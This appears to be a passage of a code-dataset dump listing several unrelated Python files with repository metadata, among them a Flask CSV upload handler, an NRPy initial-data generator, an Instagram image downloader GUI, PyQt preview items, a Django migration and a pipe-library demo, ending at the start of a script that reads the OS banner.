        # If the user does not select a file, the browser submits an
        # empty file without a filename.
        if file.filename == '':
            flash('No selected file')
            return redirect(request.url)
        if file and allowed_file(file.filename):
            flash('File uploaded Successfully!')
            filename = secure_filename(file.filename)
            file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
            # Re-open the saved file and parse it as CSV.
            # NOTE(review): the file handle is never closed explicitly.
            csv_input = csv.DictReader(open(os.path.join(app.config['UPLOAD_FOLDER'], filename)))
            # NOTE(review): release version is hard-coded to 6 — confirm.
            rel_version = release_version(6)
            db.session.add(rel_version)
            db.session.commit()
            rel_id = rel_version.id
            for row in csv_input:
                print(row)
                performance = performance_results(rel_id, row['Label'], int(row['# Samples']), int(row['Average']), int(row['Median']), int(row['90% Line']), int(row['95% Line']), int(row['99% Line']), int(row['Min']), int(row['Max']), float(row['Error %']), float(row['Throughput']), float(row['Received KB/sec']), float(row['Sent KB/sec']))
                db.session.add(performance)
                db.session.commit()
        return redirect(request.url)
    return render_template("admin/admin.html"), 404
| 37.403509 | 344 | 0.615385 | 271 | 2,132 | 4.730627 | 0.409594 | 0.037442 | 0.049142 | 0.056162 | 0.060842 | 0.060842 | 0.060842 | 0.060842 | 0 | 0 | 0 | 0.007477 | 0.247186 | 2,132 | 56 | 345 | 38.071429 | 0.791277 | 0.070826 | 0 | 0.128205 | 0 | 0 | 0.115949 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.179487 | 0.051282 | 0.410256 | 0.025641 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e58f86674bdf77a8b5f16bc946bf19c653623803 | 2,057 | py | Python | BSSN_SF/BSSN_ID_function_string.py | kazewong/nrpytutorial | cc511325f37f01284b2b83584beb2a452556b3fb | [
"BSD-2-Clause"
] | null | null | null | BSSN_SF/BSSN_ID_function_string.py | kazewong/nrpytutorial | cc511325f37f01284b2b83584beb2a452556b3fb | [
"BSD-2-Clause"
] | null | null | null | BSSN_SF/BSSN_ID_function_string.py | kazewong/nrpytutorial | cc511325f37f01284b2b83584beb2a452556b3fb | [
"BSD-2-Clause"
] | null | null | null | # This module sets up an initial data function meant to
# be called in a pointwise manner at all gridpoints.
# Author: Zachariah B. Etienne
# zachetie **at** gmail **dot* com
from outputC import *
def BSSN_ID_function_string(cf,hDD,lambdaU,aDD,trK,alpha,vetU,betU):
    """Build the C source for a pointwise BSSN_ID() initial-data function.

    The returned string contains the function prototype, the outputC-generated
    assignments of each BSSN quantity to its output pointer, and the closing
    brace.
    """
    # C prototype: coordinates in, pointers to every BSSN quantity out.
    header = (
        "void BSSN_ID(REAL xx0,REAL xx1,REAL xx2,REAL Cartxyz0,REAL Cartxyz1,REAL Cartxyz2,\n"
        "\tREAL *hDD00,REAL *hDD01,REAL *hDD02,REAL *hDD11,REAL *hDD12,REAL *hDD22,\n"
        "\tREAL *aDD00,REAL *aDD01,REAL *aDD02,REAL *aDD11,REAL *aDD12,REAL *aDD22,\n"
        "\tREAL *trK,\n"
        "\tREAL *lambdaU0,REAL *lambdaU1,REAL *lambdaU2,\n"
        "\tREAL *vetU0,REAL *vetU1,REAL *vetU2,\n"
        "\tREAL *betU0,REAL *betU1,REAL *betU2,\n"
        "\tREAL *alpha,REAL *cf) {\n"
    )
    # Expressions to emit, in the same order as the output pointers below.
    expressions = [hDD[0][0], hDD[0][1], hDD[0][2], hDD[1][1], hDD[1][2], hDD[2][2],
                   aDD[0][0], aDD[0][1], aDD[0][2], aDD[1][1], aDD[1][2], aDD[2][2],
                   trK,
                   lambdaU[0], lambdaU[1], lambdaU[2],
                   vetU[0], vetU[1], vetU[2],
                   betU[0], betU[1], betU[2],
                   alpha, cf]
    output_vars = ["*hDD00", "*hDD01", "*hDD02", "*hDD11", "*hDD12", "*hDD22",
                   "*aDD00", "*aDD01", "*aDD02", "*aDD11", "*aDD12", "*aDD22",
                   "*trK",
                   "*lambdaU0", "*lambdaU1", "*lambdaU2",
                   "*vetU0", "*vetU1", "*vetU2",
                   "*betU0", "*betU1", "*betU2",
                   "*alpha", "*cf"]
    # outCverbose=False prevents enormous output files.
    body = outputC(expressions, output_vars, filename="returnstring",
                   params="preindent=1,CSE_enable=True,outCverbose=False",
                   prestring="", poststring="")
    return header + body + "}\n"
| 55.594595 | 115 | 0.500243 | 229 | 2,057 | 4.471616 | 0.401747 | 0.101563 | 0.123047 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.076812 | 0.32912 | 2,057 | 36 | 116 | 57.138889 | 0.665217 | 0.109869 | 0 | 0 | 0 | 0.107143 | 0.336623 | 0.024671 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035714 | false | 0 | 0.035714 | 0 | 0.107143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5919a61e375fbb9499ebd4f58ee76df900f51b5 | 8,163 | py | Python | CollectData/instagram_downloader_public.py | erik1110/face-transformation | e9afab85340522c8e19d73b08cedced187d8ada0 | [
"MIT"
] | 1 | 2020-10-04T07:39:50.000Z | 2020-10-04T07:39:50.000Z | CollectData/instagram_downloader_public.py | erik1110/face-transformation | e9afab85340522c8e19d73b08cedced187d8ada0 | [
"MIT"
] | null | null | null | CollectData/instagram_downloader_public.py | erik1110/face-transformation | e9afab85340522c8e19d73b08cedced187d8ada0 | [
"MIT"
] | null | null | null | #!/usr/bin/python
# coding:utf-8
"""
Instagram Downloader
"""
import os
import logging
import time
import requests
from datetime import datetime
import tkinter as tk
from tkinter import ttk
from tkinter import messagebox
from selenium import webdriver
from webdriver_manager.chrome import ChromeDriverManager
from bs4 import BeautifulSoup as bs
class MyApp(object):
    """Tkinter front-end for a Selenium-based Instagram image downloader.

    The window collects a destination folder, a scrape mode ("id" for a
    user profile or "tag" for a hashtag page), the id/tag value and an
    image-count limit, then drives a Chrome webdriver that scrolls the
    page, collects <img> URLs and saves them as numbered .jpg files.
    """
    def __init__(self):
        # Configure logging first so every later step can report problems.
        self.set_log()
        self.root = tk.Tk()
        self.root.title("Instgram Downloader")
        self.root.geometry('500x250')
        self.canvas = tk.Canvas(self.root, height=400, width=700)
        self.canvas.pack(side='top')
        self.setup_ui()

    def set_log(self):
        """Create the working directories and configure a timestamped log file."""
        if not os.path.exists('./screenshot'):
            os.mkdir('./screenshot')
        if not os.path.exists('./log'):
            os.mkdir('./log')
        # strftime() expands the %-placeholders into the app start time.
        log_name = 'log/RPA_%Y%m%d_%H%M%S.log'
        logging.basicConfig(level=logging.INFO,
                            filename=datetime.now().strftime(log_name),
                            filemode='w',
                            format='%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s')
        self.logger = logging.getLogger(log_name)

    def setup_ui(self):
        """
        setup UI interface
        """
        self.label_save_file = tk.Label(self.root, text='存檔資料夾:')
        self.label_pattern = tk.Label(self.root, text = "選擇模式:")
        self.label_id = tk.Label(self.root, text = "id or tag:")
        self.label_limit = tk.Label(self.root, text='圖片上限:')
        self.input_save_file = tk.Entry(self.root, width=30)
        self.input_pattern = ttk.Combobox(self.root, values=["id", "tag"])
        self.input_pattern.current(0)
        self.input_limit = tk.Entry(self.root, width=30)
        self.input_id = tk.Entry(self.root, width=30)
        # NOTE(review): input_tag is created but never placed or read.
        self.input_tag = tk.Entry(self.root, width=30)
        self.login_button = tk.Button(self.root, command=self.run, text="Run", width=10, foreground = "black")
        self.quit_button = tk.Button(self.root, command=self.quit, text="Quit", width=10, foreground = "black")

    def gui_arrang(self):
        """
        setup position of UI
        """
        self.label_save_file.place(x=60, y=30)
        self.label_pattern.place(x=60, y=70)
        self.label_id.place(x=60, y=110)
        self.label_limit.place(x=60, y=150)
        self.input_save_file.place(x=130, y=30)
        self.input_pattern.place(x=130, y=70)
        self.input_id.place(x=130, y=110)
        self.input_limit.place(x=130, y=150)
        self.login_button.place(x=130, y=190)
        self.quit_button.place(x=270, y=190)

    def check(self):
        """Validate the form inputs and create the save folder.

        Returns:
            True when all inputs are usable (and the save folder exists),
            False otherwise; failures are reported via messagebox and log.
        """
        # check your input
        self.save_file = self.input_save_file.get()
        self.pattern = self.input_pattern.get()
        self.id = self.input_id.get()
        if len(self.save_file) == 0 or len(self.pattern) == 0 or \
                len(self.id) == 0 or len(self.input_limit.get()) == 0:
            messagebox.showinfo(title='System Alert', message='不得為空!')
            self.logger.info('填選處為空值!')
            return False
        try:
            self.limit = int(self.input_limit.get())
        except ValueError:
            # Non-integer limit entered by the user.
            messagebox.showinfo(title='System Alert', message='限制數應為整數!')
            self.logger.info('限制數應為整數!')
            return False
        # check the scrape mode
        if not self.pattern in ['id', 'tag']:
            messagebox.showinfo(title='System Alert', message=f'模式輸入有誤')
            self.logger.warning('The pattern is wrong!')
            return False
        # the internal working folders must not be used as the save folder
        if self.save_file in ['log', 'screenshot']:
            messagebox.showinfo(title='System Alert', message=f'該資料夾檔名不可使用!')
            self.logger.warning('The file name is wrong!')
            return False
        if not os.path.exists(f'./{self.save_file}'):
            os.mkdir(f'./{self.save_file}')
            messagebox.showinfo(title='System Alert', message=f'已建立{self.save_file}的資料夾')
            self.logger.info(f'Make dir:{self.save_file}')
        return True

    def download(self):
        """Scroll the Instagram page with Selenium and save the images found."""
        # get driver (webdriver_manager downloads a matching chromedriver)
        driver = webdriver.Chrome(ChromeDriverManager().install())
        driver.maximize_window()
        # create url for the chosen mode
        if self.pattern == 'id':
            user_id = self.id
        elif self.pattern == 'tag':
            user_id = f'explore/tags/{self.id}/'
        origin_url = 'https://www.instagram.com/' + user_id
        driver.get(origin_url)
        time.sleep(3)
        SCROLL_PAUSE_TIME = 3
        images_unique = []
        # Get scroll height
        last_height = driver.execute_script("return document.body.scrollHeight")
        while True:
            # Wait to load page
            time.sleep(SCROLL_PAUSE_TIME)
            # Scroll down to bottom
            driver.execute_script("window.scrollTo(0, document.body.scrollHeight);")
            # Wait
            time.sleep(1)
            # Click the "show more posts" button when Instagram renders it.
            try:
                button_name = f'顯示更多 {user_id} 的貼文'
                show_more = driver.find_element_by_xpath(f"//*[contains(text(),'{button_name}')]")
                show_more.click()
            except:
                pass
            # Wait to load page
            time.sleep(SCROLL_PAUSE_TIME)
            # Calculate new scroll height and compare with last scroll height
            new_height = driver.execute_script("return document.body.scrollHeight")
            if new_height == last_height:
                # Bottom reached: jump back to the top and stop scrolling.
                driver.execute_script("window.scrollTo(document.body.scrollHeight,0);")
                break
            # This means that there is still photos to scrap
            last_height = new_height
            time.sleep(1)
            # Re-parse the page and merge any <img> tags not seen before.
            html_to_parse = str(driver.page_source)
            html = bs(html_to_parse, "html5lib")
            # Get the image's url (Instagram post thumbnails use class FFVAD)
            images_url = html.findAll("img", {"class": "FFVAD"})
            # Keep only tags not collected on a previous iteration.
            in_first = set(images_unique)
            in_second = set(images_url)
            in_second_but_not_in_first = in_second - in_first
            result = images_unique + list(in_second_but_not_in_first)
            images_unique = result
            # if the images greater than the limit, break
            if len(images_unique) > self.limit:
                break
        num_images = len(images_unique)
        self.logger.info(f'抓到{num_images}張圖片')
        # Close the webdriver
        driver.close()
        for i, _ in enumerate(images_unique):
            try:
                # Save each image as <save_file>/<id><index>.jpg
                name = f"./{self.save_file}/{self.id}" + str(i) + ".jpg"
                with open(name, 'wb') as handler:
                    img_data = requests.get(images_unique[i].get("src")).content
                    handler.write(img_data)
            except:
                self.logger.warning('無法存取:{}'.format(images_unique[i]))

    def run(self):
        """Run-button handler: validate the form, then download and report."""
        start_time = datetime.now()
        if self.check():
            self.download()
            messagebox.showinfo(title='System Alert', message='程式執行完畢!')
        else:
            self.logger.warning('檢查不通過!')
        end_time = datetime.now()
        # .seconds is fine for runs shorter than one day (the expected case).
        execution_time = (end_time - start_time).seconds
        # BUG FIX: the original passed print-style positional arguments
        # ('Total Execution time:', execution_time, 's') to logger.info;
        # logging %-formats the message with those args, which raised
        # "not all arguments converted" and dropped the record entirely.
        self.logger.info('Total Execution time: %s s', execution_time)
        messagebox.showinfo(title='System Alert', message=f'執行時間:{execution_time}秒')

    def quit(self):
        """Quit-button handler: destroy the Tk root window."""
        self.root.destroy()
def main():
    """Construct the GUI application and enter the Tk event loop."""
    app = MyApp()
    # Position the widgets before handing control to the event loop.
    app.gui_arrang()
    tk.mainloop()


if __name__ == '__main__':
    main()
e5955e9b54c057b715c9c61eeca8482e6b1cbc74 | 474 | py | Python | src/entrypoint.py | nastjamakh/home-credit-risk | 610d5cd4ddfed4298b4119ca1a5d73609a339e6a | [
"MIT"
] | null | null | null | src/entrypoint.py | nastjamakh/home-credit-risk | 610d5cd4ddfed4298b4119ca1a5d73609a339e6a | [
"MIT"
] | null | null | null | src/entrypoint.py | nastjamakh/home-credit-risk | 610d5cd4ddfed4298b4119ca1a5d73609a339e6a | [
"MIT"
] | null | null | null | """CLI interface."""
import fire
from train import TrainingPipeline
from data.load import FileDataLoader
from modelling.estimator import HeuristicEstimator
class Entrypoint:
    """CLI entrypoint: each attribute becomes a Fire sub-command group."""

    def __init__(self) -> None:
        # Sub-commands exposed on the command line: train, data, model.
        self.train = TrainingPipeline()
        self.data = FileDataLoader()
        self.model = HeuristicEstimator()
def cli() -> None:
    """Start the Fire-powered command-line interface."""
    fire.Fire(Entrypoint)


if __name__ == "__main__":
    cli()
| 18.96 | 50 | 0.672996 | 49 | 474 | 6.265306 | 0.530612 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.208861 | 474 | 24 | 51 | 19.75 | 0.818667 | 0.111814 | 0 | 0 | 0 | 0 | 0.019753 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.153846 | false | 0 | 0.307692 | 0 | 0.538462 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
e59674284af4fef611fde876735095fbdeedb812 | 538 | py | Python | Working folder/refactored/Player_Ability.py | rschnek/SpaceShooterRemix | 7e667183e770679d593f46b119780ad72f4e3135 | [
"MIT"
] | null | null | null | Working folder/refactored/Player_Ability.py | rschnek/SpaceShooterRemix | 7e667183e770679d593f46b119780ad72f4e3135 | [
"MIT"
] | null | null | null | Working folder/refactored/Player_Ability.py | rschnek/SpaceShooterRemix | 7e667183e770679d593f46b119780ad72f4e3135 | [
"MIT"
] | null | null | null | import pygame
from os import path
import constants as con
class ability:
    """Tracks the player's power level with a time-based decay.

    Power rises via powerup() and decays one step at a time once
    `con.poweruptime` milliseconds have passed since the last change
    (pygame ticks are milliseconds since pygame.init()).
    """

    def __init__(self):
        # Start at base power with the decay timer anchored to "now".
        self.__power = 1
        self.__power_timer = pygame.time.get_ticks()

    def powerdown(self):
        """Drop one power level once the power-up duration has elapsed."""
        elapsed = pygame.time.get_ticks() - self.__power_timer
        if elapsed <= con.poweruptime:
            return
        self.__power -= 1
        self.__power_timer = pygame.time.get_ticks()

    def powerup(self):
        """Raise power by one and restart the decay timer."""
        self.__power += 1
        self.__power_timer = pygame.time.get_ticks()

    def get_Power(self):
        """Return the current power level."""
        return self.__power
| 24.454545 | 74 | 0.620818 | 68 | 538 | 4.485294 | 0.352941 | 0.236066 | 0.183607 | 0.236066 | 0.468852 | 0.468852 | 0.468852 | 0.468852 | 0.468852 | 0.468852 | 0 | 0.007833 | 0.288104 | 538 | 21 | 75 | 25.619048 | 0.788512 | 0 | 0 | 0.1875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.1875 | 0.0625 | 0.5625 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 5 |
e59820d95011ac7776cfe69371f262bf5dfa9d62 | 3,475 | py | Python | src/preview_item.py | viraelin/yame | 2cd2bfa6143c3578ecede602dd1c05236122c1cf | [
"MIT"
] | null | null | null | src/preview_item.py | viraelin/yame | 2cd2bfa6143c3578ecede602dd1c05236122c1cf | [
"MIT"
] | null | null | null | src/preview_item.py | viraelin/yame | 2cd2bfa6143c3578ecede602dd1c05236122c1cf | [
"MIT"
] | null | null | null | # Copyright (C) 2022 viraelin
# License: MIT
from PyQt6.QtCore import *
from PyQt6.QtWidgets import *
from PyQt6.QtGui import *
import system
from layer_type_menu import LayerType
class PreviewTile(QGraphicsRectItem):
    """Square outline item previewing a tile placement on the grid."""

    def __init__(self) -> None:
        super().__init__()
        # todo: derive the color from the actual tile data instead of
        # this hard-coded placeholder.
        self.color = QColor("#080808")
        cell = system.cell_size
        self.setRect(QRectF(0, 0, cell, cell))
        self.setZValue(400)

    def snap(self, pos: QPointF) -> None:
        """Move the tile to the nearest grid cell."""
        snapped = system.get_snap_pos(pos)
        self.setX(snapped.x())
        self.setY(snapped.y())

    def boundingRect(self) -> QRectF:
        """Grow the rect so the outline stroke is not clipped when repainting."""
        margin = 4
        return self.rect().adjusted(-margin, -margin, margin, margin)

    def paint(self, painter: QPainter, option: QStyleOptionGraphicsItem, widget: QWidget) -> None:
        """Draw an unfilled square outline in the tile color."""
        outline = QPen()
        outline.setStyle(Qt.PenStyle.SolidLine)
        outline.setCapStyle(Qt.PenCapStyle.SquareCap)
        outline.setJoinStyle(Qt.PenJoinStyle.MiterJoin)
        outline.setColor(self.color)
        outline.setWidth(2)
        no_fill = QBrush()
        no_fill.setStyle(Qt.BrushStyle.NoBrush)
        # Expand by half the stroke width so the outline sits on the edge.
        half = 1
        frame = self.rect().adjusted(-half, -half, half, half)
        painter.setPen(outline)
        painter.setBrush(no_fill)
        painter.drawRect(frame)
class PreviewEntity(QGraphicsRectItem):
    """Translucent rect previewing an entity placement, sized from a model row."""

    def __init__(self, item: QStandardItem) -> None:
        super().__init__()
        index = item.index()
        role = Qt.ItemDataRole.DisplayRole
        width = index.siblingAtColumn(1).data(role)
        height = index.siblingAtColumn(2).data(role)
        self.color = QColor(index.siblingAtColumn(3).data(role))
        # Mostly transparent so the preview does not obscure the scene.
        self.color.setAlphaF(0.1)
        origin_name = index.siblingAtColumn(4).data(role)
        self.offset = system.OriginPoint[origin_name].value
        self.setRect(QRectF(0, 0, width, height))
        self.setZValue(400)

    def snap(self, pos: QPointF) -> None:
        """Snap to the grid, compensating for the entity's origin point."""
        # todo: this is copied from snapping GraphicsItem
        shift_x = int(self.offset.x() * self.rect().width())
        shift_y = int(self.offset.y() * self.rect().height())
        snapped = system.get_snap_pos(pos - QPointF(shift_x, shift_y))
        self.setX(snapped.x())
        self.setY(snapped.y())

    def paint(self, painter: QPainter, option: QStyleOptionGraphicsItem, widget: QWidget) -> None:
        """Draw a filled, outlined rect inset so the stroke stays inside the bounds."""
        outline = QPen()
        outline.setStyle(Qt.PenStyle.SolidLine)
        outline.setCapStyle(Qt.PenCapStyle.SquareCap)
        outline.setJoinStyle(Qt.PenJoinStyle.MiterJoin)
        outline.setColor(self.color)
        stroke = 4
        outline.setWidth(stroke)
        fill = QBrush()
        fill.setColor(self.color)
        fill.setStyle(Qt.BrushStyle.SolidPattern)
        inset = stroke / 2
        frame = self.rect().adjusted(inset, inset, -inset, -inset)
        painter.setPen(outline)
        painter.setBrush(fill)
        painter.drawRect(frame)
| 29.201681 | 98 | 0.61295 | 396 | 3,475 | 5.292929 | 0.285354 | 0.030057 | 0.042939 | 0.069179 | 0.566794 | 0.566794 | 0.549141 | 0.474714 | 0.474714 | 0.41937 | 0 | 0.014578 | 0.26964 | 3,475 | 118 | 99 | 29.449153 | 0.811269 | 0.086906 | 0 | 0.506024 | 0 | 0 | 0.002213 | 0 | 0 | 0 | 0 | 0.008475 | 0 | 1 | 0.084337 | false | 0 | 0.060241 | 0 | 0.180723 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e59b01a27430e94ec873e872b409079f3cbd1265 | 781 | py | Python | rznotifier/migrations/0004_auto_20160619_1004.py | rskokan/robozebra | 907ef76b00bef7208078a6ec08260212b2f9aa20 | [
"Apache-2.0"
] | null | null | null | rznotifier/migrations/0004_auto_20160619_1004.py | rskokan/robozebra | 907ef76b00bef7208078a6ec08260212b2f9aa20 | [
"Apache-2.0"
] | null | null | null | rznotifier/migrations/0004_auto_20160619_1004.py | rskokan/robozebra | 907ef76b00bef7208078a6ec08260212b2f9aa20 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-06-19 08:04
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: relax three Loan columns to allow NULL."""

    dependencies = [
        ('rznotifier', '0003_loan_notified'),
    ]

    operations = [
        # Publication date may now be absent.
        migrations.AlterField(
            model_name='loan',
            name='date_published',
            field=models.DateTimeField(null=True),
        ),
        # Main income type may now be absent.
        migrations.AlterField(
            model_name='loan',
            name='main_income_type',
            field=models.CharField(max_length=30, null=True),
        ),
        # Region may now be absent.
        migrations.AlterField(
            model_name='loan',
            name='region',
            field=models.SmallIntegerField(null=True),
        ),
    ]
| 25.193548 | 61 | 0.582586 | 78 | 781 | 5.653846 | 0.628205 | 0.136054 | 0.170068 | 0.197279 | 0.287982 | 0.287982 | 0.204082 | 0.204082 | 0 | 0 | 0 | 0.040293 | 0.300896 | 781 | 30 | 62 | 26.033333 | 0.767399 | 0.085787 | 0 | 0.391304 | 1 | 0 | 0.106892 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.086957 | 0 | 0.217391 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
e59c0f14387bcc428f3ef596243e548882b04d5f | 54 | py | Python | spotifymoods/__init__.py | ammar-oker/spotifymoods | b5f24e48cc6f17fdbf42001e3e5ec00606b07f5c | [
"MIT"
] | null | null | null | spotifymoods/__init__.py | ammar-oker/spotifymoods | b5f24e48cc6f17fdbf42001e3e5ec00606b07f5c | [
"MIT"
] | null | null | null | spotifymoods/__init__.py | ammar-oker/spotifymoods | b5f24e48cc6f17fdbf42001e3e5ec00606b07f5c | [
"MIT"
] | null | null | null | from .train import train
from .predict import predict
| 18 | 28 | 0.814815 | 8 | 54 | 5.5 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.148148 | 54 | 2 | 29 | 27 | 0.956522 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 5 |
e59e35b470fb03223bde0bdc8a8066d61bc5a26b | 1,522 | py | Python | snippets/python/pipe_functional_programming/pipe_example.py | jerabaul29/config_scripts_snippets | c192f50c7cf90088862fd1f4d5678e0936cc375c | [
"MIT"
] | null | null | null | snippets/python/pipe_functional_programming/pipe_example.py | jerabaul29/config_scripts_snippets | c192f50c7cf90088862fd1f4d5678e0936cc375c | [
"MIT"
] | 6 | 2021-10-12T12:27:27.000Z | 2022-03-11T19:45:35.000Z | snippets/python/pipe_functional_programming/pipe_example.py | jerabaul29/config_scripts_snippets | c192f50c7cf90088862fd1f4d5678e0936cc375c | [
"MIT"
] | null | null | null | from pipe import Pipe
from pipe import select as pmap
from pipe import where as filter
from pipe import take
import functools
from icecream import ic
ic.configureOutput(prefix="", outputFunction=print)
"""
For my part, I like to stick to the usual functional programming terminology:
take
map
filter
reduce
"""
# Add a reduce stage usable inside a pipe chain.
@Pipe
def preduce(iterable, function):
    # Pipe-compatible reduce: collapses the piped iterable to a single value.
    # The pipe supplies `iterable` first, so the arguments arrive swapped
    # relative to functools.reduce(function, iterable).
    return functools.reduce(function, iterable)
def dummy_func(x):
    """Identity function that announces each value it processes.

    Used to make the lazy evaluation of the pipe visible: the message is
    only printed when the pipeline is actually consumed.
    """
    message = f"processing at value {x}"
    print(message)
    return x
print("----- test using a range() as input -----")
# Building the pipeline triggers no work yet: every stage is lazy.
res_with_range = (range(100) | pmap(dummy_func)
                             | filter(lambda x: x % 2 == 0)
                             | take(2) )

print("*** what is the resulting object ***")
ic(res_with_range)

# Forcing the generator with list() is what actually runs dummy_func.
print("*** what happens when we force evaluation ***")
ic(list(res_with_range))

"""
This prints:
----- test using a range() as input -----
*** what is the resulting object ***
res_with_range: <generator object take at 0x7f60bd506d60>
*** what happens when we force evaluation ***
processing at value 0
processing at value 1
processing at value 2
processing at value 3
processing at value 4
list(res_with_range): [0, 2]
"""

print()
print("----- test using a range() as input but outputing a value not iterator -----")
# preduce is terminal: it collapses the pipeline into a single value,
# so evaluation happens immediately here.
res_with_reduce = (range(100) | pmap(dummy_func)
                              | filter(lambda x: x % 3 == 1)
                              | take(2)
                              | preduce(lambda x, y: x + y))
ic(res_with_reduce)
e59fc847dbc2cbfebb58016de59804f87b3a6672 | 686 | py | Python | Code/Data_Generator/dgenerator_instances_json.py | AymanABDELHAMID/OD_MTO_DARP | a942faabfa6c1a24d9046d74e56a48bd0d2a6d48 | [
"MIT"
] | 1 | 2020-06-19T18:38:31.000Z | 2020-06-19T18:38:31.000Z | Code/Data_Generator/dgenerator_instances_json.py | AymanABDELHAMID/OD_MTO_DARP | a942faabfa6c1a24d9046d74e56a48bd0d2a6d48 | [
"MIT"
] | null | null | null | Code/Data_Generator/dgenerator_instances_json.py | AymanABDELHAMID/OD_MTO_DARP | a942faabfa6c1a24d9046d74e56a48bd0d2a6d48 | [
"MIT"
] | null | null | null | """
Mai 2020 - Ayman Mahmoud
--------------------------------------------
This code - as the title tells will read the data in
the instances .txt files and generate .json files
along the way the data will be modified to input missing data from the instances given
"""
import re
# Lines after the '*' separator belong to the second part of the instance
# file and are skipped.
second_part = False
costs = []

with open("data/darp_instances/RL_DARP/RL_d01.txt", "r") as f:
    # Skip the 4-line header of the instance file.
    for line in f.readlines()[4:]:
        if line[0] == "*":
            second_part = True
        if not second_part:
            # Split the line on whitespace, then drop the first and last
            # tokens (presumably a leading id/empty token and the empty
            # token left by the trailing newline -- TODO confirm against
            # the instance-file format) and keep the integer costs.
            line_numbers = list(re.split('\s+', line))
            line_numbers.pop(0)
            line_numbers.pop()
            costs.append([int(n) for n in line_numbers])

print(costs)
| 26.384615 | 86 | 0.590379 | 99 | 686 | 3.989899 | 0.59596 | 0.111392 | 0.070886 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017375 | 0.244898 | 686 | 25 | 87 | 27.44 | 0.745174 | 0.377551 | 0 | 0 | 1 | 0 | 0.102625 | 0.090692 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.076923 | 0 | 0.076923 | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e5a1307319cf2f807f6042d57a0f8ef329aff915 | 2,322 | py | Python | Modulos/cfirm.py | ovpn-web/lundy | 15f6743995aa5916ba5957dd284e695d1dcc83d5 | [
"CC0-1.0"
] | 1 | 2020-07-14T16:48:06.000Z | 2020-07-14T16:48:06.000Z | Modulos/cfirm.py | ovpn-web/lundy | 15f6743995aa5916ba5957dd284e695d1dcc83d5 | [
"CC0-1.0"
] | null | null | null | Modulos/cfirm.py | ovpn-web/lundy | 15f6743995aa5916ba5957dd284e695d1dcc83d5 | [
"CC0-1.0"
] | 1 | 2021-12-27T00:38:34.000Z | 2021-12-27T00:38:34.000Z | #!/usr/bin/env python
# encoding: utf-8
import smtplib,socket,sys
from os import system
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from datetime import datetime
# Script arguments: installer name and server IP address.
_NOME_ = sys.argv[1]
_IP_ = sys.argv[2]

# Read the OS banner file; after the loop _OS_ holds the LAST line of
# /etc/issue.net with its newline stripped.
# NOTE(review): the file handle is never closed.
_ADRESS_OS_ = '/etc/issue.net'
OS = open(_ADRESS_OS_).readlines()
for SYS in OS:
